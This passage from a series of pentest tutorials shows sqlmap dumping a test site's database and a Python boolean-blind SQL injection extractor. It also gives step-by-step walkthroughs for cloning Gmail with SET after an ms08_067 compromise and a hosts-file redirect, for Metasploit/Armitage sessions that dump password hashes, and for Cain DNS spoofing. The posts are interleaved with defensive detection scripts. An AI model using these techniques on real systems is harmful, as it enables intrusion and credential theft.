condimentum facilisis\nnulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.\nCras venenatis.
 Aliquam posuere lobortis pede. Nullam fringilla urna id leo.\nPraesent aliquet pretium erat. Praesent non odio.
 Pellentesque a magna a\nmauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad\nlitora torquent
per conubia nostra, per inceptos hymenaeos. Aliquam lacus.\nMauris magna eros, semper a, tempor et, rutrum et, tortor
.\n</p> | lyzae | 3 |
| <p>\nLorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu.
Phasellus sollicitudin. Vestibulum condimentum facilisis\n nulla. In hac habitasse platea dictumst.
Nulla nonummy. Cras quis libero.\n Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo.\n
Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a\n mauris vulputate lacinia. Aenean viverra.
 Class aptent taciti sociosqu ad\n litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus.\n
Mauris magna eros, semper a, tempor et, rutrum et, tortor.\n</p>\n<p>\nLorem ipsum dolor sit amet, consectetuer
 adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum
facilisis\n nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.\n Cras venenatis. Aliquam
posuere lobortis pede. Nullam fringilla urna id leo.\n Praesent aliquet pretium erat. Praesent non odio.
Pellentesque a magna a\n mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad\n litora
torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus.\n Mauris magna eros, semper a, tempor et,
rutrum et, tortor.\n</p> | r4w8173 | 1 |
| <p>\nLorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\nSed aliquam sem ut arcu.
Phasellus sollicitudin. Vestibulum condimentum facilisis\nnulla. In hac habitasse platea dictumst. Nulla nonummy.
 Cras quis libero.\nCras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo.\nPraesent aliquet
 pretium erat. Praesent non odio. Pellentesque a magna a\nmauris vulputate lacinia. Aenean viverra. Class aptent
taciti sociosqu ad\nlitora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus.\nMauris magna eros,
 semper a, tempor et, rutrum et, tortor.\n</p>\n<p>\nLorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec
 molestie.\nSed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis\nnulla. In hac habitasse
 platea dictumst. Nulla nonummy. Cras quis libero.\nCras venenatis. Aliquam posuere lobortis pede. Nullam
 fringilla urna id leo.\nPraesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a\nmauris
vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad\nlitora torquent per conubia nostra, per
inceptos hymenaeos. Aliquam lacus.\nMauris magna eros, semper a, tempor et, rutrum et, tortor.\n</p> | Blad3 | 2 |
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------+-----------+

[16:57:49] [INFO] Table 'acuart.artists' dumped to CSV file '/pentest/database/sqlmap/output/
test.acunetix.com/dump/acuart/artists.csv'
[16:57:49] [INFO] fetching columns for table 'pictures' on database 'acuart'
[16:57:49] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': pic_id,
 int(5), pshort, mediumtext, plong, text, price, int(11), cat_id, int(11), a_id, int(11), title, varchar(100),
img, varchar(50)
[16:57:49] [INFO] fetching entries for table 'pictures' on database 'acuart'
Database: acuart
Table: pictures
[7 entries]
+------+--------+------------------+--------+-------+-------+--------+-------+
| a_id | cat_id | img              | pic_id | plong | price | pshort | title |
+------+--------+------------------+--------+-------+-------+--------+-------+
| 2 | 1 | ./pictures/7.jpg | 7 | bla bla bla long | 15000 | bla bla bla | Trees |
| 1 | 2 | ./pictures/6.jpg | 6 | <p>\nThis picture is an 99 cm x 200 cm masterpiece.\
n</p>\n<p>\nThis text is not meant to be read. This is being used as a place holder.
Please feel free to change this by inserting your own information.This text is not meant to be read.
This is being used as a place holder. Please feel free to change this by inserting your own information.
This text is not meant to be read. This is being used as a place holder. Please feel free to change this
 by inserting your own information.This text is not meant to be read. This is being used as a place holder.
 Please feel free to change this by inserting your own information. \n</p> | 10000 | Lorem ipsum dolor sit
 amet, consectetuer adipiscing elit. Donec molestie.\nSed aliquam sem ut arcu. Phasellus sollicitudin.\n | Thing |
| 1 | 1 | ./pictures/5.jpg | 5 | <p>\nThis picture is an 53 cm x 12 cm masterpiece.\n</p>\n<p>\nThis text
is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting
 your own information.This text is not meant to be read. This is being used as a place holder. Please feel free
to change this by inserting your own information.This text is not meant to be read. This is being used as a place
holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This
is being used as a place holder. Please feel free to change this by inserting your own information. \n</p> | 460
| Lorem ipsum dolor sit amet, consectetuer adipiscing elit. | Mean |
| 1 | 1 | ./pictures/2.jpg | 2 | <p>\nThis picture is an 53 cm x 12 cm masterpiece.\n</p>\n<p>\nThis text is
 not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your
 own information.This text is not meant to be read. This is being used as a place holder. Please feel free to
change this by inserting your own information.This text is not meant to be read. This is being used as a place
holder. Please feel free to change this by inserting your own information.This text is not meant to be read.
This is being used as a place holder. Please feel free to change this by inserting your own information. \n</p>
| 800 | Donec molestie.\nSed aliquam sem ut arcu. | Mistery |
| 1 | 1 | ./pictures/1.jpg | 1 | <p>\nThis picture is an 53 cm x 12 cm masterpiece.\n</p>\n<p>\nThis text is
 not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your
own information.This text is not meant to be read. This is being used as a place holder. Please feel free to
change this by inserting your own information.This text is not meant to be read. This is being used as a place
 holder. Please feel free to change this by inserting your own information.This text is not meant to be read.
This is being used as a place holder. Please feel free to change this by inserting your own information. \n</p>
| 500 | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\nSed aliquam sem ut arcu. |
 The shore |
| 1 | 1 | ./pictures/4.jpg | 4 | <p>\nThis picture is an 53 cm x 12 cm masterpiece.\n</p>\n<p>\nThis text is not
 meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own
information.This text is not meant to be read. This is being used as a place holder. Please feel free to change
 this by inserting your own information.This text is not meant to be read. This is being used as a place holder.
 Please feel free to change this by inserting your own information.This text is not meant to be read. This is being
 used as a place holder. Please feel free to change this by inserting your own information. \n</p> | 1000 | Lorem
ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\nSed aliquam sem ut arcu. Phasellus sollicitudin
.\n | Walking |
| 1 | 1 | ./pictures/3.jpg | 3 | <p>\nThis picture is an 53 cm x 12 cm masterpiece.\n</p>\n<p>\nThis text is not
meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. \n</p> | 986 | Lorem ipsum dolor sit amet. Donec molestie.\nSed aliquam sem ut arcu. | The universe |
+------+--------+------------------+--------+-------+-------+--------+-------+

[16:57:49] [INFO] Table 'acuart.pictures' dumped to CSV file '/pentest/database/sqlmap/output/test.acunetix.com/dump/acuart/pictures.csv'
[16:57:49] [INFO] fetching columns for table 'users' on database 'acuart'
[16:57:49] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': uname, varchar(100), pass, varchar(100), cc, varchar(100), address, mediumtext, email, varchar(100), name, varchar(100), phone, varchar(100), cart, varchar(100)
[16:57:49] [INFO] fetching entries for table 'users' on database 'acuart'

[16:58:20] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request

^C
[17:01:59] [ERROR] user aborted

[*] shutting down at 17:01:59

As before, the extracted information is highlighted in red.
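As an added example (not code from the original post, nor from sqlmap itself), the following Python script reproduces against an in-memory SQLite database the boolean-based blind technique behind the `cat=1 AND 1192=1192` payload in the log above: a handler that concatenates the `cat` parameter the way the vulnerable listproducts page does, the true/false probe sqlmap starts with, and the character-by-character extraction loop that ends up reading `users.pass`. A parameterized version of the same handler shows the probe failing. Table and column names mirror the dump on this page; the rows are invented, and SQLite's `unicode()`/`substr()` stand in for MySQL's `ORD()`/`SUBSTRING()`.

```python
import sqlite3


def build_db():
    # Constructed sample database: table and column names mirror the acuart dump
    # on this page, the row contents are invented for the example.
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE pictures (pic_id INTEGER, cat_id INTEGER, title TEXT);
        INSERT INTO pictures VALUES (1, 1, 'The shore'), (2, 1, 'Mistery'), (6, 2, 'Thing');
        CREATE TABLE users (uname TEXT, pass TEXT);
        INSERT INTO users VALUES ('test', 's3cret');
    """)
    return con


def listproducts_vulnerable(con, cat):
    # Same mistake as a handler that builds "WHERE cat=" . $_GET['cat']: the parameter
    # is concatenated into the SQL text, so "1 AND 1192=1192" changes the query, not the value.
    sql = "SELECT title FROM pictures WHERE cat_id=" + cat
    return [row[0] for row in con.execute(sql)]


def listproducts_fixed(con, cat):
    # Hardened version: the value is type-checked and bound as a parameter.
    sql = "SELECT title FROM pictures WHERE cat_id=?"
    return [row[0] for row in con.execute(sql, (int(cat),))]


def is_injectable(handler, con):
    """sqlmap's first probe: 'AND true' must match the baseline page and 'AND false' must differ."""
    try:
        page_true = handler(con, "1 AND 1=1")
        page_false = handler(con, "1 AND 1=2")
    except (ValueError, sqlite3.Error):
        return False  # the parameter was rejected or bound; the probe never reached SQL
    return page_true == handler(con, "1") and page_true != page_false


def oracle(con, condition):
    """Boolean-based blind oracle: True when the injected condition holds."""
    baseline = listproducts_vulnerable(con, "1")
    return listproducts_vulnerable(con, "1 AND (" + condition + ")") == baseline


def extract_blind(con, subquery, max_len=64):
    """Recover the scalar result of `subquery` one character at a time through the oracle.
    Each character costs one length check plus about seven probes (binary search over 0..127)."""
    result = ""
    for pos in range(1, max_len + 1):
        if not oracle(con, f"length(({subquery})) >= {pos}"):
            break
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(con, f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    db = build_db()
    print("vulnerable handler injectable:", is_injectable(listproducts_vulnerable, db))
    print("fixed handler injectable:     ", is_injectable(listproducts_fixed, db))
    print("users.pass via blind SQLi:    ", extract_blind(db, "SELECT pass FROM users LIMIT 1"))
```

The oracle only needs the page to differ between a true and a false condition, which is why sqlmap reports a "boolean-based blind" injection point before it has read a single byte; the error-based payload in the log above is faster because it carries the result back inside an error message instead of one bit per request.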

That wraps up this short overview of SQLMap ;)

Regards

SET social engineering toolkit

Hi!

Hello everyone!

Browsing safely, and not entering your credentials on public networks, is nothing new.

Today I'll show how easy it is to clone a web page and capture the victim's credentials.

We'll run this attack in two parts. The first consists of getting administrator access to the victim's machine so we can modify its hosts file and redirect its requests.

To get administrator access we use the Metasploit exploit ms08_067_netapi.

Since this is nothing new, I attach an image showing how it is done step by step.

Now that we have administrator access to the remote machine, we edit its hosts file and add:

192.168.37.132 gmail.com

That is, when the victim browses to gmail.com the request goes to our PC, where we capture their credentials.

Once the hosts file is ready, we put SET to work.

Several attacks are available; we choose Website Attack Vectors.

Now we pick attack 3, Credential Harvester Attack Method.

SET ships with predefined templates, so we'll use one of them.

We'll clone Gmail.

It shows a description of the attack.

It tells us it has started the service on port 80.

When the client connects we'll get a notification.

To the user the site "looks normal".

When the user enters their credentials, they are captured.

We now have the account details.

Note that the clone is served over plain HTTP on port 80 while the real site uses HTTPS, so the missing padlock in the address bar is the one visible clue the victim gets.

So remember, only browse trusted sites :D
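The hosts-file redirect above is the part of this attack that leaves a durable trace on the victim. As an added example (not part of the original post and not SET's code), here is a Python check that parses a hosts file and flags entries that send a hostname to a routable address instead of loopback or 0.0.0.0. The sample hosts file is constructed for the example; the gmail.com line is the one added in the post, the `.corp` allowlist suffix and the `10.1.2.3` intranet entry are assumptions illustrating the legitimate case.

```python
import ipaddress

# Constructed sample hosts file. The gmail.com line is the one the post adds on the
# victim; the remaining lines are typical default, blocklist and intranet entries.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
192.168.37.132  gmail.com www.gmail.com
0.0.0.0         ads.example.net      # blocklist-style entry: harmless
10.1.2.3        intranet.corp        # LAN name legitimately mapped to a private address
"""

LOCAL_NAMES = {"localhost", "localhost.localdomain", "broadcasthost"}


def parse_hosts(text):
    """Return (ip, hostname) pairs, ignoring comments, blank and malformed lines."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # strip trailing and full-line comments
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # first field is not an address: malformed line
        for host in fields[1:]:  # one address may carry several names
            entries.append((ip, host.lower()))
    return entries


def suspicious_entries(text, allowlist=()):
    """Entries that map a hostname to a routable address (private or public).

    Loopback and unspecified targets are the normal blocking idiom and are skipped;
    `allowlist` holds DNS suffixes (e.g. '.corp') that legitimately live in hosts files."""
    flagged = []
    for ip, host in parse_hosts(text):
        if host in LOCAL_NAMES or ip.is_loopback or ip.is_unspecified:
            continue
        if any(host.endswith(suffix) for suffix in allowlist):
            continue
        flagged.append((str(ip), host))
    return flagged


if __name__ == "__main__":
    for ip, host in suspicious_entries(SAMPLE_HOSTS, allowlist=(".corp",)):
        print(f"hijacked: {host} -> {ip}")
```

On a Windows host the file lives at `%SystemRoot%\System32\drivers\etc\hosts`; comparing its contents against a known-good copy, or running a check like this one from an endpoint agent, catches exactly the entry this post plants.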


Armitage GUI front-end de Metasploit

Hi!

Hello everyone!

Anyone who works in security knows Metasploit. Metasploit can be hard to use if you don't know well how it works. There are graphical front-ends such as Armitage.

Armitage works as a front-end to Metasploit.

In BackTrack it is in the repositories, so we install it with:

root@bt: apt-get install armitage

With that, Armitage is installed on our system.

As we did with autopwn using Fast-Track, we need MySQL, so we start it:

root@bt: /etc/init.d/mysql start

Next we start the Metasploit RPC daemon that Armitage connects to. Since we'll go with the defaults, we do it like this:

root@bt:~# msfrpcd -f -U msf -P test -t Basic
[*] XMLRPC starting on 0.0.0.0:55553 (SSL):Basic...
[*] XMLRPC ready at Thu Jun 23 20:28:49 +0200 2011.

Note that msfrpcd is listening on 0.0.0.0, that is, on every interface, with a trivial password; on a shared network bind it to the loopback address instead (msfrpcd -a 127.0.0.1 ...) or pick a real password.

Now we launch Armitage:

root@bt:/pentest/exploits/armitage# ./armitage.sh

If we haven't changed anything from the default BackTrack installation, we leave the connection dialog as it is.

Armitage tells us it will use the mysql driver.

This is Armitage's main screen: on the left, the list of Metasploit exploits; at the bottom, the Metasploit console.

Now we find the hosts to launch exploits against.

With Nmap we do what we normally do: look for open ports, the operating system version, and so on.

We enter the IP range we want to scan, or the host's IP address directly if we already know it.

With the scan done, we can look for attacks matching the vulnerabilities found.

We can see the host has been identified as a Windows XP machine.

Clicking on the host shows Services and Host; clicking Services shows the services it identified.

We have the services.

Now we can search Metasploit's exploits based on the ports and services found.

It has now found the attacks we can run against the host.
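Armitage's scan-then-find-attacks step is, underneath, a join between Nmap's results and a table of module requirements. As an added example (not Armitage's code, nor from the original post), the following Python script parses the XML that `nmap -oX` writes and applies such a rule table. The XML document is constructed here, the host address is invented, and the single rule is an illustrative assumption: the module it names is the one this page uses, which targets the Windows Server service over SMB (tcp/445 or tcp/139) on hosts such as the Windows XP machine found above.

```python
import xml.etree.ElementTree as ET

# Constructed Nmap XML (the shape `nmap -sV -O -oX` produces). Addresses and details are invented.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap">
  <host>
    <status state="up"/>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc"/></port>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds" product="Microsoft Windows XP microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="closed"/><service name="ms-wbt-server"/></port>
    </ports>
    <os><osmatch name="Microsoft Windows XP SP2" accuracy="97"/></os>
  </host>
  <host>
    <status state="down"/>
    <address addr="10.0.0.6" addrtype="ipv4"/>
  </host>
</nmaprun>
"""

# Illustrative rule table (an assumption for this example; Armitage derives its suggestions
# from the Metasploit module database). Port set and OS substring must both match.
RULES = [
    {"ports": {445, 139}, "os": "windows xp", "module": "exploit/windows/smb/ms08_067_netapi"},
]


def parse_nmap(xml_text):
    """Return live hosts as dicts: address, OS guess, and {open port: service name}."""
    hosts = []
    for h in ET.fromstring(xml_text).iter("host"):
        status = h.find("status")
        if status is None or status.get("state") != "up":
            continue  # down hosts carry no ports worth matching
        addr = h.find("address[@addrtype='ipv4']").get("addr")
        osmatch = h.find("os/osmatch")  # first (best) OS match, if fingerprinting ran
        os_name = osmatch.get("name", "") if osmatch is not None else ""
        open_ports = {}
        for p in h.findall("ports/port"):
            if p.find("state").get("state") != "open":
                continue
            svc = p.find("service")
            open_ports[int(p.get("portid"))] = svc.get("name", "") if svc is not None else ""
        hosts.append({"addr": addr, "os": os_name, "ports": open_ports})
    return hosts


def find_attacks(hosts, rules=RULES):
    """Map each live host to the modules whose port and OS conditions it satisfies."""
    suggestions = {}
    for host in hosts:
        matched = []
        for rule in rules:
            if rule["os"] in host["os"].lower() and rule["ports"] & set(host["ports"]):
                matched.append(rule["module"])
        suggestions[host["addr"]] = matched
    return suggestions


if __name__ == "__main__":
    for addr, modules in find_attacks(parse_nmap(SAMPLE_NMAP_XML)).items():
        print(addr, modules or "no candidate modules")
```

A suggestion from this kind of matching is only a candidate: the OS match is a fingerprint guess with an accuracy figure, and the port being open says nothing about patch level, which is why Armitage still lets you set the exploit's options and target before launching it.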

We get a menu to launch the attack we want.

We can set advanced options for the attack.

When the machine is compromised it looks like this.

The host is now compromised.

In the Metasploit console we can see it obtained a Meterpreter session.

The Meterpreter options are also available graphically.

We can browse the whole operating system.

And we can dump the users' password hashes.

And we can get a Windows CMD shell.

And that's it for a Meterpreter session.

DNS poisoning con Cain y Abel

Hi!

Hello everyone!

Yesterday we saw how to run a man in the middle attack with Cain & Abel. Today we'll poison DNS, so that the victim's queries, for example for http://dragonjar.org, get redirected to http://seifreed.com. Cain's APR-DNS does this from the ARP man in the middle position, altering the DNS replies that pass through our machine, rather than by touching any server's cache.

This lets us, for example, impersonate a page without the user noticing, or redirect them to a page serving exploits.

With the man in the middle running, we go to APR – DNS.

We add the URL we want to spoof.

We've configured it so that every time the user goes to http://dragonjar.org, we resolve it to the host we want.

After entering the domain we're interested in, we resolve it to get its IP.


We can see all the traffic being generated.

DNS poisoning attacks are very dangerous: the address bar shows the legitimate name while the content comes from a host we control.
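As an added example (not Cain's code, nor from the original post), the following Python script builds a DNS A-record reply of the shape a spoofer injects and shows the check a defender can apply on the victim's side: parse the reply that arrived and compare the answer against addresses obtained over a path the attacker does not control (a VPN, DoH, or a resolver reached from another network). The packet is constructed here, and the addresses are RFC 5737 documentation ranges standing in for the real dragonjar.org and seifreed.com hosts.

```python
import socket
import struct


def encode_name(name):
    """dragonjar.org -> b'\\x09dragonjar\\x03org\\x00' (RFC 1035 label format)."""
    out = b""
    for label in name.strip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_a_response(txid, name, ip, ttl=300):
    """Construct a minimal DNS response: standard query response, 1 question, 1 A answer.

    This is the shape a spoofer injects: the transaction id and question copied from the
    victim's query, and an answer carrying whatever address the attacker chooses."""
    header = struct.pack(">HHHHHH", txid, 0x8180, 1, 1, 0, 0)  # QR=1, RD=1, RA=1, RCODE=0
    question = encode_name(name) + struct.pack(">HH", 1, 1)    # QTYPE=A, QCLASS=IN
    answer = b"\xc0\x0c"                                       # pointer to the name at offset 12
    answer += struct.pack(">HHIH", 1, 1, ttl, 4) + socket.inet_aton(ip)
    return header + question + answer


def read_name(pkt, off):
    """Decode a possibly compressed name; return (name, offset just past it in the stream)."""
    labels, end = [], None
    while True:
        length = pkt[off]
        if length & 0xC0 == 0xC0:  # compression pointer: 2 bytes, continue at the target
            if end is None:
                end = off + 2
            off = struct.unpack(">H", pkt[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if length == 0:
            break
        labels.append(pkt[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), (end if end is not None else off)


def parse_a_answers(pkt):
    """Return (transaction id, [(name, ipv4)]) for the A records in the answer section."""
    txid, _flags, qdcount, ancount, _ns, _ar = struct.unpack(">HHHHHH", pkt[:12])
    off = 12
    for _ in range(qdcount):
        _, off = read_name(pkt, off)
        off += 4  # QTYPE + QCLASS
    answers = []
    for _ in range(ancount):
        name, off = read_name(pkt, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack(">HHIH", pkt[off:off + 10])
        off += 10
        rdata = pkt[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rdlen == 4:
            answers.append((name, socket.inet_ntoa(rdata)))
    return txid, answers


def detect_spoof(pkt, expected):
    """Answers whose address is not in `expected` ({name: set of trusted IPv4 strings})."""
    _, answers = parse_a_answers(pkt)
    return [(name, ip) for name, ip in answers if ip not in expected.get(name, set())]


if __name__ == "__main__":
    # Constructed: 203.0.113.10 plays the legitimate dragonjar.org address obtained over a
    # trusted path, 198.51.100.7 plays the attacker-chosen host the spoofed reply points at.
    trusted = {"dragonjar.org": {"203.0.113.10"}}
    forged = build_a_response(0x1234, "dragonjar.org", "198.51.100.7")
    print("spoofed answers:", detect_spoof(forged, trusted))
```

Comparing answers this way is the same idea behind DNSSEC validation and certificate pinning: something outside the poisoned path has to vouch for the address, because within that path every reply the victim sees is under the attacker's control.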

Regards
